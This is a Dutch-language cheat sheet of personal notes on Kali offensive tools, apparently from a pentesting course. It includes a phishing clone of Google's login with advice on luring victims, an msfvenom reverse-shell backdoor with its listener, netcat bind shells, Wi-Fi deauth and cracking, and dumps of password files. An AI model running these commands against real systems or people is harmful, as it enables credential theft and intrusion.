KB » Computer » Hacking Tools

Hacking Tools

    Tweeten

recon-ng

Als Recon-NG niet geinstalleerd is, voer dan dit uit:

apt-get update apt-get install -y git apt-get install -y python-pip python-dev build-essential pip install --upgrade pip pip install --upgrade virtualenv git clone: https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Nu recon-ng gedownload is, gaan we het installeren:

cd recon-ng pip install -r REQUIREMENTS

Dit gaat over versie 4.9.3.

show options is hier ook een commando. Om waardes te veranderen gebruik je set, bv. set timeout 1000

Discovering Modules

1 van de commando's is show modules. Er zijn meer dan 80 preconfigured modules. Je kan bv. zeggen: use recon/domains-vulnerabilities

Of: use discovery/info_disclosure/cache_snoop, en dan set source URL (je kan ook het IP address gebruiken).

Exploiting Modules

Je moet soms een nameserver opgeven, en soms een source.

Scan the site using a specific search engine, with our proper API keys inserted, we can easily tell Recon-NG which search engine to use: use google

Er zijn meerdere modules met 'google' erin, zoals recon/domain_hosts/google_site_api of recon/domain_hosts/google_site_web

Social Engineering Toolkit

Met SET (Social Engineering Toolkit) kan je mock emails in bulk verzenden, en site cloning en packet sniffing doen.

Start SET met setoolkit

Dit programma is interactief, en vraagt je steeds via cijfers een keuze te maken.

Voor de veiligheid altijd eerst 4 kiezen, om de laatste updates te hebben.

Op trustedsec.com kan je een ge-update versie van SET ophalen.

Site cloning

Kies in SET eerst optie 1, dan Website Attack Vectors, Credential Harvester en dan Site Cloner

Spear fishing

Je kiest 2 x 1 vanuit het hoofdmenu van SET, daarna heb je 3 opties, o.a. een Mass Email Attack. Hij kiest voor de optie Microsoft Windows Media Center vulnerability. Dan voor de Windows Reverse TCP Shell.

Voorbeeld (credentials harvesting)

Kies nr. 3 in het beginmenu, en dan voor 1 (Web Templates).

Je moet vervolgens een IP-adres opgeven, bv. van je Kali machine.

Volgende stap is een template kiezen, bv. van Facebook of Twitter. Hier wordt Google gekozen. Als je naar die pagina toegaat, moet je inloggen met de credentials van je Google account. Als je inlogt, met wat voor gegevens dan ook, ga je naar de echte Google site. Op je Kali PC zie je de gebruikte credentials.

Virusscanners kunnen dit niet detecteren, omdat het een compleet legaal mechanisme is. Men bezoekt jouw server, tikt iets in, en wordt doorgestuurd naar Google.

Het moeilijkste probleem is: hoe krijg je gebruikers zo gek om naar de nieuwe website te gaan?!

Als iemand op hetzelfde netwerk zit kan je DNS spoofing gebruiken.

Op social networks zou je een shortened link naar je fake site kunnen zetten. Op bv.

xHydra

Je kan met deze tool de poort specificeren waarop je het password wilt kraken, dus o.a. bv. geschikt voor SSH (poort 22).

Ook kan je het protocol opgeven, bv. ssh of smb.

Ncrack

Deze tool wordt het meest voor remote desktop gebruikt, maar bv. http kan ook.

Als je ziet dat poort 3389 open staat, kan je met remote desktop (ook vanuit Linux) verbinding maken: rdesktop -u Administrator IP_address

ncrack -v -f --user administrator -P wordlist rdp://IP_address,CL=1 ('v'=verbose)

Cupp (wordlist generator)

Gebruik cupp om allerlei feitjes over een gebruiker aan elkaar te koppelen. Deze tool zit niet standaard in Kali: apt-get install cupp

cupp -i (interactive), en daarna worden je vragen gesteld. De resulterende file is niet supergroot maar wel effectief.

Kismet

Wireless hacking suite, bestaande uit scanner, packet sniffer en IDS.

Grafische tool, starten vanaf command line. Geeft overzicht van access points in de omgeving, en nog veel meer mogelijkheden.

Automatically start Kismet server? beantwoorden met Yes.

Je kan console window sluiten.

Hij klaagt waarschijnlijk over dat er geen sources zijn, en je moet dus je interface naam invullen.

Als een client verbinding maakt met een hidden SSID laat Kismet automatisch de naam zien.

Na het beëindigen van het programma is er een bestand met de extensie .nettxt dat je met bv. Nano kan bekijken.

wifijammer

Download Wifi Jammer van github.com

Je opent de file wifijammer.py, en klikt dan op Raw. Dan kopiëer je de URL. Op de command line tik je wget URL

Dan python wifijammer.py --help

python wifijammer.py --world -a AP_MAC_addr

wifi fisher

Tool is (11-2018) niet meer van Github te downloaden, maar anders
git clone URL
cd /wifiphiser
python setup.py install

Deze tool heeft 2 wireless interfaces nodig. Als je die niet hebt --nojamming optie aanzetten.

Gebruik pijltjes om het target AP te kiezen dat je wilt clonen, en geef Enter

Daarna moet je nog een scenario kiezen. Nr. 1 is bv. dat de client bij het verbinden een melding krijgt over firmware upgrade, en zijn password moet intikken. Als hij dat doet krijg jij het te zien, en krijgt hij een melding over upgrade in progress. Daarna kan je Ctrl+C doen.

Wifi Pumpkin

Ook van Github (niet meer), maar na clone-commando ./installer.sh --install

Na starten moet je IP-adres van router in Gateway-veld zetten. Het SSID moet hetzelfde zijn als dat van het netwerk dat je wilt aanvallen, en dat geldt ook voor het kanaal.

Op het Pumpkin-Proxy tabblad zijn een lading plugins te zien. Hier wordt de dnsspoof plugin gebruikt als voorbeeld. Achter domain_3 wordt de local server ingevuld.

Op het Home tabblad kan je alle apparaten zien die verbinding maken met je access point.

wifite

Automated wireless hacking tool, m.b.v. Python-script. Doet hetzelfde werk als de aircrack-ng suite, maar dan geautomatiseerd.

Help info met wifite --help

Met Ctrl+C kan je het scanproces stoppen of overschakelen op een andere kraakmethode.

Fern

Fern is een graphical interface die o.a. gebruik maakt van aircrack-ng

Tik in: fern-wifi-cracker

Eerst selecteer je je interface (bv. wlan0), dan start je een scan.

Je klikt op een WEP of WPA access point dat gevonden is, en dan op Automate. Kies verder voor Regular attack en ARP Request Replay.

Wat er achter de schermen gebeurt is achtereenvolgens:
aircrack-ng start wlan0
airodump-ng -c channel -w filename -b BSSid_of_AP monitor_interface
aireplay-ng -1 0 -a MAC_addr mon_if
aireplay-ng -3 -b MAC_addr mon_if
aircrack-ng filename

Xplico

Deze tools is web-based, en heeft de Apache server nodig. Dus eerst: service apache2 start

Op de webpagina van Xplico staat dat je nu het volgende moet doen: /etc/init.d/xplico start

Met Ettercap start je een sniffing sessie, en op de pagina van Xplico klik je op New Case. Dan kies je voor Live acquisition, en klik je op Create

Dubbelklik op de nieuw aangemaakte case, en klik dan op New session, geef er een naam aan, en klik op Create

Je moet nu nog de interface kiezen, en op Start klikken.

Als je nu op de target machine een browsing sessie opent loop je kans op warnings, omdat de browser merkt dat er gesniffed wordt.

Na het stoppen van de sessie kan je links in het menu (bv. onder Web) zien welke sites bezocht zijn of plaatjes bekeken, welke mails verstuurd zijn, etc.

Ettercap

Deze tool is alleen voor het onderscheppen van verkeer.

Een man-in-the-middle attack maakt gebruik van ARP poisoning. Daar kan je dit programma voor gebruiken.

Je volgt de volgende stappen:

Kies in Ettercap voor Sniff - Unified sniffing, en stel je netwerk interface in (bv. eth0).

Dan Hosts - Scan for hosts

Dan Mitm - ARP poisoning en Sniff remote connections, gevolgd door Start - Start sniffing

Nu maak je op je Windows machine met Putty verbinding met de Metasploitable machine. Dan zie je dat Ettercap de credentials heeft onderschept.

Hetzelfde zou ook lukken als je naar de web interface van Metasploitable gaat. Als je naar Connections en het subvenster Connection data toe gaat, zie je bv. zelfs de inhoud (HTML) van web pages.

Een manier om zo'n aanval te vermijden is dus het gebruik van encryptie.

Dit soort aanvallen kan ook in wireless netwerken worden uitgevoerd.

theharvester

Deze pagina op hackers-arise.com bevat veel info over deze tool.

theHarvester is a command-line tool included in Kali Linux that acts as a wrapper for a variety of search engines and is used to find email accounts, subdomain names, virtual hosts, open ports / banners, and employee names related to a domain from different public sources (such as search engines and PGP key servers). In recent versions, the authors added the capability of doing DNS brute force, reverse IP resolution, and Top-Level Domain (TLD) expansion.

Het verzamelen van emails over een target kan met theHarvester (-h voor help info).

Opties:
-d: Search through targets domain
-b: Search through specific data source (e.g. Google)
-l: Set limitations to search results
-h: Use Shodan to help query discovered hosts

Doe: theHarvester -d microsoft.com -l 5000 -b all (domain microsoft.com; -b all betekent dat je van alle zoekmogelijkheden, zoals Google, gebruik maakt).

Je kan er zelfs een zoektocht met Shodan aan toevoegen:
theharvester -d microsoft.com -b all -h results

Problemen

Je kan theHarvester overal in Kali aanroepen, en je hoeft niet naar een speciale map (zoals in een hackingcursus gesuggereerd werd), en ook niet theHarvester.py aan te roepen (al dan niet met Python). Je moet wel denken aan de hoofdletter!!!

Met de -f filename optie gaat de uitvoer naar 2 files: filename.html en filename.xml. Je hoeft niet zelf een extensie op te geven. De 1e file kan je gewoon met Firefox openen.

Ik krijg de foutmelding:

HTTPConnectionPool(host='www.google.com', port=80): Max retries exceeded with url: /search?num=100&start=0&hl=en&meta=&q=%40%22udemy.com%22 (Caused by NewConnectionError(': Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')) local variable 'r' referenced before assignment

Maar een volgende keer werkt het ineens wel. Ik heb de indruk dat veel sites alleen te gebruiken zijn als je ergens credentials voor die site hebt staan of meegeeft.

Armitage

Dit is de grafische user interface voor Metasploit, en geschikter voor beginners.

Er is een tutorial voor Armitage

Linksboven zie je de modules, onderverdeeld in 4 categorieën, en kan je zoeken (probeer bv. smb in te tikken). Onder zie je het console window, waar ook de uitvoer verschijnt. Rechtsboven is de workspace, waar je alle machines ziet waarmee je interactie hebt.

Ook hier moet je eerst de database starten, met service postgresql start en
msfdb init of
(en iemand heeft het ook nog over service metasploit start).

Als er desondanks problemen zijn met dit programma kan je het ook verwijderen en weer installeren:
apt-get remove armitage

Daarna voeg je een host toe (bv. die van Metasploitable) (via Hosts - Add host). Een range kan je opgeven bv. als 192.168.178.0/24

Je kan ook via het Hosts-menu een nmap-scan doen. Met rechtsklikken op een gevonden machine, kan je alle services zien die op die machine lopen.

Na rechtsklikken op een machine kan je voor Scan kiezen.

Dan klik je op Attacks - Find attacks

Als een exploit succesvol was, komt er een bliksem door de computer.

Er is dan weer een menu bijgekomen als je rechtsklikt op de computer, nl. Shell 1, met o.a. de keuze Interact.

In het menu Attacks kan je ook kiezen voor Hail Mary. Dan worden alle exploits tegelijk benut, dus de kans op ontdekking behoorlijk vergroot.

Voorbeeld waarbij je van tevoren al een exploit hebt gevonden

Zoek op een Microsoft exploit voor Server 2003, 03_026 (je kan ook op beschrijving zoeken, bv. rpc dcom).

Je dubbelklikt op de gevonden exploit, en vult (in dit geval) de remote host in.

Als je bevestigt, en de exploit wordt succesvol uitgevoerd, verschijnt de aangevallen computer met een rood frame en een bliksem erdoor. Je kan er dan rechts op klikken, dan Meterpreter 1

Port scanning

In het zoekvenster kan je ook bv. port intikken, om bij de portscanning module uit te komen (auxiliary - scanner - portscan - tcp).

sqlmap

Dit is een open source tool om SQL injection kwetsbaarheden te detecteren en er gebruik van te maken.

Doe vanaf de command line sqlmap -u URL --dbs
Vragen met yes beantwoorden.

Als je een lijst met database krijgt, kan je je richten op 1 ervan, met sqlmap -u -D dbnaam --tables

Daarna vraag je kolommen op, met sqlmap -u -D dbnaam -T tablename --columns

Als het niet lukt om binnen te komen kan je nog de switch --level level toevoegen, waarbij level een waarde tussen 1 en 5 is. Met 5 wordt er zo diep mogelijk gezocht.

Google dorking met SQLMap:

Je kan ook SQLMap gebruiken: sqlmap -g URL (of IP address).

Extracting Passwords from Target Columns

Zoeken naar passwords: sql -u URL --passwords

Dumping table entries

Als je alle table entries wilt dumpen kan je dit doen: sql -u URL --dump

Finding Vulnerabilities with SQLMap

sqlmap --url domain/wp-admin/profile.php?wp_http_referer=%2Fwp-admin%2Fusers.php --level 5 --risk 3
Er komt dan een vraag over 'page comparison'. Beantwoord die met continue

wash

wash -i interface laat zien welke versie van WPS access points gebruiken.

wash -i interface -C is ook een mogelijkheid.

joomscan

joomscan -u URL

Installeren met apt-get install -y joomscan

Zie Joomscan – OWASP Joomla Vulnerability Scanner Project.

reaver

Dit programma maakt gebruik van de pincode (8 cijfers) van WPS om de key van een access point (WPA(2)) te vinden. Eerst kan je met wash de WPS-enabled access points vinden. (In mijn situatie zijn ze dat allemaal, alleen sommige WPS 1.0 en de meeste WPS 2.0).

reaver -b AP_MAC_addr -c channel -i interface
Evt. kan je -vv toevoegen voor verbose output.

Soms word je door een router buitengesloten na een aantal foute connectiepogingen, en in de help info van reaver kan je bij de 'Advanced options' een aantal mogelijkheden vinden om dat te omzeilen. Je kan bv. een delay instellen tussen pin attempts.

Het kan 3 tot 10 uur duren voor er resultaten zijn.

msfvenom

Een Metasploit tool om payloads en backdoors te genereren.

msfvenom -a x86 - p windows/meterpreter/reverse_tcp LHOST=IP_address LPORT=4444 -f exe -o /root/backdoor.exe (a=archictecture, f=format, o=output file).

mv backdoor.exe /var/www/html
service apache2 start
service postgresql start (listener)
msfconsole
use multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost IP_address
set lport 4444
run

Tik dan in het URL-veld van de browser:
IP_address/backdoor.exe
Download hem, en voer de file uit. Je hebt dan een reverse Meterpreter shell.

Je kan met help meer info krijgen. 1 optie is het commando screenshot. sysinfo is ook een nuttige.

Om te zien of de machine een virtuele is:
run post/windows/gather/checkvm

Om de shell meer stabiel te maken, kan je dit doen:
run post/windows/manage/migrate

Om een lijst van geïnstalleerde applicaties te krijgen:
run post/windows/gather/enum_applications

En een lijst van ingelogde gebruikers:
run post/windows/gather/enum_logged_on_users

Metasploit

Dit is een open source framework voor exploits.

Database

Voor je Metasploit gaat gebruiken moet je de db initialiseren, met
service postgresql start of
msfdb init of
/etc/init.d/postgresql start Met msfdb stop stop je de database.

Met msfdb -h krijg je meer info.

Starten en stoppen

Met msfconsole start je Metasploit.

Om het console te verlaten tik je exit -y

Help info

? geeft je een lijst met commando's.

Met help krijg je help info.
show -h geeft je extra info over het show-commando.
En je kan ook help command doen.

Diversen

Met version zie je de versie van Metasploit.

Om te zien wat de status van de database is, doe je db status

Zoeken

Met search kan je meer gericht zoeken, en met de optie -h krijg je help-informatie.

search value zoekt naar modules/payloads.

Gebruiken exploit

info module_name laat informatie zien.

check laat zien of het doel kwetsbaar is voor een module.

Met show options laat opties zien die je voor een module kan instellen.

Met set option_name value verander je de waarde van die optie in die waarde.

show payloads laat de code zien die je na de exploit moet uitvoeren.

use module_name laadt een module om voor een exploit te gebruiken.

Met exploit wordt de exploit uitgevoerd.

Voorbeeld 1

Voer bv. de volgende commando's uit (die werken bv. voor de Metasploitable machine):
search vsftp
Kopiëer de naam van de module (1e kolom) en doe info module_name
use module_name (autocomplete met Tab werkt ook i.p.v. copy/paste)
show options
set rhost IP_address
show options (let op verandering)
show payloads
check (niet alle modules ondersteunen dat commando) exploit -j (background job)
sessions -l (list)
sessions -i 1 (interact met sessie 1)
Vanaf hier kan je Unix commando's intikken, bv. whoami
Aan het eind: exit

Voorbeeld 2

Zoek bv. naar de Server 2003 exploit MS03-026, met search ms03-026

Dan tik je use name, waarbij je de waarde gebruikt die onder Name staat.

Dan tik je: show options, en je ziet dat er een remote host (RHOST) en een remote port (RPORT) nodig is. De port is al ingevuld.

set RHOST IP_address

Tik exploit, en je komt in een meterpreter-sessie.

Voorbeeld 3

Hij tikt zonder enige uitleg in:
use auxiliary/scanner/smb/smb_enumusers (omdat hij weet dat de aan te vallen machine smb gebruikt).

Doe show options. Je ziet dat je alleen RHOSTS en THREADS hoeft op te geven (omdat ze in hoofdletters staan?).

set RHOSTS IP_address

run levert weinig op.

Show anonymous logins

use auxiliary/scanner/ftp/anonymous (je ziet anonymous users die met je FTP poort verbinden). Je zet dan RHOSTS op 192.168.1.0-255, en set threads 55. Daarna run

airmon-ng

Bedoeld om wireles adapter in monitor mode te zetten, en de status te bekijken.

In monitor mode zie je alle packets in de wifi-range van onze kaart. Monitor mode zet je als volgt aan:
ifconfig wlan0 down
airmon-ng start wlan0
In Kali 2 verandert wlan0 in wlan0mon) (In oudere versies heb je er een wireless card bijgekregen, nl. mon0).

Om monitor mode uit te zetten doe je airmon-ng stop mon0

Problemen

Je krijgt de foutmelding: Failed to set wlan0mon up using ip, al staat de kaart wel in monitor mode (maar station mode disabled).

Oplossing: doe vooraf airmon-ng check kill (er worden dan een paar processen gekilled die in de weg zitten).

Met airmon-ng check kan je zien welke processen misschien in de weg zitten.

Airodump-ng

Hiermee zie je een overzicht van alle access points in de omgeving, of van 1 specifiek access point (evt. met aangekoppelde apparaten).

Tik in: airodump-ng interface (interface kan mon0 of wlan0mon zijn).

Problemen

Je krijgt de fout ioctl(SIOCSIFFLAGS) failed: Device or resource busy
Oplossing: Linux herstarten.

Je krijgt niets te zien.
Oplossing: Kijk met rfkill of het device geblocked is.

Beschrijving van de uitvoer

In de kolom PWR (power) zie je hoe dichtbij een access point is (minder negatief is dichterbij).

Onder BEACONS zie je het aantal signalen dat van dat access point komt ("hier ben ik"). Dit is "the number of captured ESSID broadcasts".

Onder #data zie je het aantal nuttige pakketten dat je gesniffed hebt (number of captured data packets).

Onder #/s zie je het aantal datapakketten dat je in de laatste 10 seconden gesniffed hebt.

Onder MB zie je maximaal ondersteunde snelheid.

Onder ENC zie de gebruikte encryptiemethode (OPN/WEP/WPA/WPA2).

Onder CIPHER zie je de gebruikte cipher (WEP/WEP40/WEP104/TKIP/CCMP/WRAP).

Onder AUTH zie je het type authenticatie dat nodig is, bv. PSK (pre-shared key) (of SKA of MGT).

In de 2e helft van het scherm:

Hidden SSID'

Je ziet ook hidden SSID's (broadcast mode off) met airodump-ng, alleen zonder zijn naam.

Zodra je met bv. je mobiel verbinding maakt met die router, wordt zijn naam ineens wel zichtbaar.

1 access point monitoren

airodump-ng --channel chan --bssid MAC_addr --write output_filename interface

Je hebt nu dezelfde sectie als eerst, met maar 1 regel, maar ook een nieuwe daaronder, met alle clients.

Na afloop zijn er 4 files aangemaakt. De filenaam die je gespecificeerd hebt is slechts een prefix. airodump-ng plakt er een volgnummer achter, en 4 verschillende extensies: .cap, .csv, .kismet.csv en .kismet.netxml

De .cap-file kan je met Wireshark openen, maar veel spannends zal je vanwege de encryptie niet zien.

aireplay-ng

aireplay-ng --deauth 4 -a Router_MAC_addr -c Client_MAC_addr interface zorgt ervoor dat de verbinding van de client met de router wordt verbroken. (4 is het aantal de-authentication packets.)

aireplay-ng --deauth nr_of_packets -a Router_MAC interface als je een deauthenticate wilt doen voor alle clients.

aireplay-ng --deauth nr_of_packets -a Router_MAC -c Target_MAC interface als je een deauthenticate wilt doen voor 1 specifieke client.

aircrack-ng

Dit programma combineert elk password in de wordlist met de naam van het AP, en berekent dan een Pairwise Master Key met het pbkdf2 algoritme. De key wordt dan vergeleken met de handshake file.

aircrack-ng handshake_file -w wordlist

airolib-ng

In de tijd dat je wacht tot een client verbinding maakt met het AP, kan je alvast de wordlist omzetten in een PMK lijst. Dat proces (berekenen van de PMK's) kost nl. de meeste tijd.

Er zijn 4 stappen.

Maak een database, en importeer de worlist:
airolib-ng db_name --import passwd dictionary
Vbd.: airolib-ng mydb --import passwd mylist

Importeer de target ESSID (router MAC address):
airolib-ng db_name --import essid essid_file
Vbd.: airolib-ng mydb --import essid essid-name

Bereken PMK's voor de wordlist:
airolib-ng db_name --batch
Vbd.: airolib-ng mydb --batch

Kraak de key m.b.v. de PMK-file:
airolib-ng -r db_name handshake_file
Vbd.: airolib-ng -r mydb Ziggo-router.cap

Macchanger

macchanger --help voor help-informatie (vrij beperkt).

Voor de rest wijst de tool zichzelf.

Verbinding maken met AP als je MAC address geblokkeerd is

Zet je wlan0mon interface down, met ifconfig wlan0mon down.
Dan macchanger -m MAC_addr interface, waarbij het MAC address dat is van een apparaat dat al verbinding heeft met het access point (kan je in de onderste helft van het airodum-ng scherm zien).
Zet dan de interface weer up.

Netdiscover

Werkt alleen op local area networks, omdat het gebaseerd is op ARP.

Denk erom dat je de goede network interface gebruikt!
netdiscover -i eth0 -r 192.168.1.0/24

Op een netwerk met 192.168.56.x adressen werkt netdiscover -r 192.168.56.0/8 om 1 of andere reden niet, maar netdiscover -r 192.168.56.0/16 wel. Beebox en Metasploitable krijgen zoals verwacht IP-adressen 101 en 102 (uitgifte vanaf 100 geregeld in VirtualBox), maar Knoppix1 om duisteren redenen 110.

Discover

Command line tool met een menu van zo'n 12 items. Je kan o.a. zoeken op domains en personen. Maar ik heb van dat laatste nog geen resultaten gezien.

Zoek in Google op github en discover(.sh), en kopieer de link die je dan krijgt (). Doe op de cmdline in Kali: git clone link. Er wordt dan een map discover aangemaakt.

CeWL

Bouw een wordlist of dictionary gebaseerd op je eigen criteria (bv. tussen 5 en 10 tekens lang) en de inhoud van een website.

Cain and Abel

Windows tool voor password cracking en network sniffing. Gemakkelijk in gebruik.

Mimikatz

Probeert plaintext passwords, hashes, PIN codes and Kerberos tickets van een Windows-machine te halen.

Kan gebruikt worden voor pass-the-hash, pass-the-ticket en het aanmaken van Golden Tickets.

Patator

Multi-purpose brute force attack tool.

Medusa

Brute force password attack tool.

Deze tool is sneller dan Hydra en ondersteunt talloze remote authentication protocols (rlogin, ssh, telnet, http, etc.).

Hydra

Brute force network log on cracking tool. Probeert herhaaldelijk in een online systeem in te loggen.

Aanroepen zonder opties geeft help info.

Deze tool kan voor verschillende soorten authentication schemas gebruikt worden, zoals FTP, HTTP, etc.

hydra -l user -P password_list -v IP_address ftp
hydra -L usernames -p Pass.txt IP_address ssh -t1

Vanzelfsprekend zijn dit soort attacks noisy.

Je kan het proces versnellen door meerdere threads te gebruiken, maar niet elk protocol laat dat toe.

Het is de kunst om bij een brute force attack een intelligente password list te gebruiken.

Crunch

Een tool om een wordlist mee te maken.

crunch min max characters=character_list -t pattern -o filename (min is minimum aantal tekens).

Voorbeeld: crunch 6 8 123456!"&$% -o wordlist -t a@@@@b

Voorbeeld: om wachtwoord te genereren met de volgende structuur Abc$#123 doe je crunch 8 8 -t ,@@^^%%%
Je krijgt dan wel een file van meer dan 100 GB.

Met de -p optie kan je er voor zorgen dat er geen repeating characters in de passwords voorkomen. De optie moet de laatste zijn.

FGDUMP

Deze tool draai je onder Windows, en geeft info over de users en passwords.

WCE (Windows Credentials Editor)

Op een 64-bit systeem moet je de 64-bit versie van deze tool gebruiken.

John the Ripper

Op een bestand met Windows hashes kan je ook John the Ripper loslaten:
john filename
Dit kan wel heel lang duren.

Incremental mode

Standaard worden tussen 1 en 8 tekens geprobeerd. Stel je hebt een password met alleen lowercase letter, dan doe je: john -incremental=Alpha pw.txt

Als je alleen passwords hebt met lengte 5, dan voeg je een nieuwe mode toe aan de config file:

[Incremental:Alpha5] File=$JOHN/lower.chr MinLen=5 MaxLen=5 CharCount=26

Unshadow

Op een Linux zou je bv. dit kunnen proberen:
unshadow /etc/passwd /etc/shadow > password.txt

Daarna john password.txt

Ollydbg

Assembly level debugger for Windows.

Immunity debugger

Schrijven van exploits, analyzeren van malware en reverse engineer.

Ondersteunt Python APIs en execution.

Je kunt daardoor sneller werken dan met Ollydbg.

GNU debugger

Ondersteunt een hele lading programmeertalen, en draait op Linux/Unix.

Interactive DisAssembler (IDA)

Vertaalt executables naar assembly language. Ondersteunt executables van meerdere operating systems

hashcat

Zeer snelle password cracking tool, die ook van de GPU gebruik kan maken. Werkt op Windows en Linux.

hash-identifier

hash-identifier kan je van de Kali site downloaden.

Je start de tool, en die vraagt dan om de hash.

De tool kan niet met zekerheid zeggen welk type hash het is.

Netcat

Status van een poort

Je kan controleren of een poort open is met netcat -v IP-adres poortnummer

Serie open poorten controleren

nc -nvv -w 1 -z IP_address 20-30

Controleren op binnenkomende verbinding (listener opzetten)

Met netcat kan je luisteren op poort 8080:
netcat -v -l -p 8080 (de 'v' staat voor verbose, de 'l' voor listen). Je kan de opties ook combineren: netcat -lvp 5555 (bv.).

Je kan de listener ook zo opzetten dat hij een command prompt start als er een verbinding binnenkomt: netcat -lvp 5555 -e /bin/bash

In dat geval kan je vanaf de besturende PC Linux commando's geven, zoals bv. whoami.

Stel je doet op de Windows machine nc -vlp 4444 -e cmd.exe en onder Kali nc IP_adres_Windows 4444 dan krijg je een command prompt op de Windows machine vanuit je Kali machine. Daarmee kan je dus remote administration doen.

Verbinding maken met andere PC

Op de andere machine kan je dan nc IP_adres poort_nummer intikken, en dan wordt er een verbinding tot stand gebracht. Tekst die je op de ene PC tikt wordt op de andere weergegeven, en omgekeerd.

Output naar een file sturen

Je kan ook file transfer doen met netcat. Op de ene machine doe je dan bv. nc IP_adres 4444 > test.txt, en op de andere nc -vlp 4444 < abc.txt

De filenamen op de 2 machines hoeven niet gelijk te zijn.

Drozer

Security audit and attack framework. Heeft tools om public Android exploits te gebruiken.

Android APK decompilation for the lazy

Python code die APK-file omzet naar Java source code.

APK Studio

Cross platform IDE om Android application binaries te reverse engineer en recompile.

hping

Command line TCP/IP packet assembler and analyzer. Kan TCP, UDP, ICMP en RAW-IP protocols gebruiken.

Met hping kan je ook stealth mode scanning doen. Je ziet dan o.a. open poorten, server name, flags, title, ID, etc. Doe: hping3 URL -S

Je kan ook 1 poort scannen: hping3 URL --port 80 -S

Wireshark

Dit is een open source packet analyzer.

Je kan het programma hier downloaden.

En hier kan je meer over het programma leren.

Als je aan het experimenteren bent kan je beter 2 opties uitzetten.

Ga naar Capture - Options - Enable promiscuous mode on all interfaces, en haal het vinkje weg. Anders wordt niet alleen het verkeer naar je Kali machine gemonitord, maar al het verkeer over het netwerk.

Op het tabblad Options staat het veld Resolve MAC Adresses. Haal ook hier het vinkje weg.

Bij capturing met Wireshark moet promiscuous mode aan staan (Capture - Options op het Input tabblad). Op het Options tabblad moet onder Name resolution een vinkje staan voor Resolve MAC Addresses.

WhatWeb

The WhatWeb tool is used to identify different web technologies used by the website. It identifies the different content management systems, statistic/analytics packages, and JavaScript libraries used to design the web application. The tool claims to have over 900 plugins. It can be run at different aggression levels that balance speed and reliability. The tool may get enough information on a single web page to identify the website, or it may recursively query the website to identify the technologies used.

WhatWeb - Next generation web scanner version 0.5.1. Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles) Homepage: https://www.morningstarsecurity.com/research/whatweb Usage: whatweb [options] Enter URLs, hostnames, IP addresses, filenames or IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x format. --input-file=FILE, -i Read targets from a file. --aggression, -a=LEVEL Set the aggression level. Default: 1. 1. Stealthy Makes one HTTP request per target and also follows redirects. 3. Aggressive If a level 1 plugin is matched, additional requests will be made. --list-plugins, -l List all plugins. --info-plugins, -I=[SEARCH] List all plugins with detailed information. Optionally search with a keyword. --verbose, -v Verbose output includes plugin descriptions. Note: This is the short usage help. For the complete usage help use -h or --help.

masscan

usage: masscan -p80,8000-8100 10.0.0.0/8 --rate=10000 scan some web ports on 10.x.x.x at 10kpps masscan --nmap list those options that are compatible with nmap masscan -p80 10.0.0.0/8 --banners -oB save results of scan in binary format to masscan --open --banners --readscan -oX read binary scan results in and save them as xml in

Nmap

Bedoeld voor port scanning, zien welke ports open zijn en wat voor services er op draaien, en schatten welk operating system er draait.

De grafische versie is Zenmap. Als je een melding krijgt over dat eth0 niet werkt, moet je even het commando nmap -iflist uitvoeren. In mijn geval moest ik eth2 gebruiken, en dat doe je door extra optie -e eth2 mee te geven.

Help info

Je kan man nmap gebruiken.

Config files

De configuratie van deze tool zit in /usr/share/nmap.

In de file nmap-services zit een lijst van alle poorten, met de services die er op draaien, en zelfs de waarschijnlijkheid van het open zijn van die poort.

Diagnostische info

Met nmap -V kan je de versie van nmap zien.

Gebruik bijna altijd de -v optie (verbose output), en evt. zelfs de -vv optie (voor nog meer output).

Testen

Er is een site op het Internet die je mag scannen: scanme.nmap.org

Scripts

Zitten in /usr/share/nmap/scripts

Om voor een specifieke Cold Fusion vulnerability te scannen:
nmap -v -p 80 --script http-vuln-cve2010-2861 IP_address

Je kan ook alle scripts in 1 keer uitvoeren:
nmap -v -p 80 --script all IP_address

Opties

Een paar veelgebruikte opties:

Betekenis output

Als een port filtered is, betekent dat dat nmap niet kan bepalen of hij open of closed is.

DNS

Nmap comes with a script to query the DNS server for additional hosts using a brute forcing technique. It makes use of the vhosts-defaults.lst and vhosts-full.lst dictionary files, which contain a large list of common hostnames that have been collected over the years by the Nmap development team. The files can be located at /usr/share/nmap/nselib/data/ . Nmap sends a query to the DNS server for each entry in that file to check whether there are any A records available for that hostname in the DNS zone.

nmap --script dns-brute --script-args dns-brute.domain=domain

HTTP methods

In the repository of Nmap scripts, you can find a script named http-methods.nse. When you run the script using the --script option along with the target, it will list the allowed HTTP methods on the target, and it will also point out the dangerous methods (zoals TRACE).

Diversen

Om bv. je eigen subnet te scannen doe je nmap -oG - 192.168.1.0-255 -vv (de -oG is om greppable output te produceren).

nmap 192.168.1/24 kan ook. Dit scant alle adressen op het lokale subnet.

Je kan ook 2 IP-adressen opgeven: nmap 192.168.0.1 192.168.0.31. Beide adressen worden gescand. Een andere manier om dit commando te geven is nmap 192.168.0.1,31.

nmap -sS -O IP_adres ('O' staat voor operating system, 'S' staat voor services).

In Wireshark zie je nu dat er SYN-packets gestuurd worden, en dat er soms een RST, ACK terugkomt. In dat geval is de poort gesloten.

Met nmap -sV IP_adres zie je de versies van de services die draaien op de open ports. Je kan zo'n versie plus het woord 'exploit' in een zoekmachine plakken, en kijken of er een vulnerability in zit.

Met nmap -sT IP_adres worden TCP ports gescanned.

Als je een lange scan doet kan je ook om de zoveel seconden de status laten weergeven, bv. met nmap 192.168.0.1/24 -stats-every 3s

Om een snelllere scan te doen geeft je -F mee.

Naast de -O om het operating system te scannen, kan je ook -osscan-guess meegeven.

Je kan ook op een specifieke port scannen, met nmap -p portnr IP_adres
Je kan meerdere poortnummers opgeven, gescheiden door komma's.
In plaats van een poortnummer kan je ook de naam van een service opgeven. Servicenamen kan je ook weer door komma's scheiden.

Om random hosts op Internet te scannen kan je dit doen: nmap -iR 3 (voor 3 hosts).

Je kan ook de IP-adressen van een aantal targets in een bestand zetten (bv. targets.txt, en ze scannen met nmap -iL targets.txt

Met -iL input_file_name kan je opgeven welke hosts en netwerken gescanned moeten worden.

Op deze manier kunnen we voorbij routers en firewalls komen: nmap -sS -P0 IP_address (als P0 geen protocols als argument heeft worden ICMP packets e.d. gestuurd).

Zombie Mode

